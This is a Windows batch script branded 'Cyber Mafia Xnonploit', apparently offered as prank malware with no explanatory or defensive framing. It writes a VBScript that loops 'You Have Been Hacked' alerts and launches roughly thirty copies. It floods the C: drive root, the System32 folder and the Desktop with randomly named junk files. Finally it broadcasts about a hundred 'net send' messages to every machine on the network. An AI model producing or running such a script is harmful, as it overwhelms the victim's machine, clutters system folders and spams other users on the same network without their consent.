:::::::::::::::::::::::::
::Cyber Mafia Xnonploit::
:::::::::::::::::::::::::
@echo off

echo Do>>msgbox.vbs
echo x=msgbox("You Have Been Hacked.",vbExclamation or vbOkOnly,"Hacked") >>msgbox.vbs
echo Loop>>msgbox.vbs
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
::---------------------------::
::-------Spam C Drive--------::
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
::---------------------------::
::----Spam System32 Folder---::
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
::---------------------------::
::-------Spam Desktop--------::
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
::---------------------------::
::----Spam With Net Send-----::
net start "messenger"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
::---------------------------::
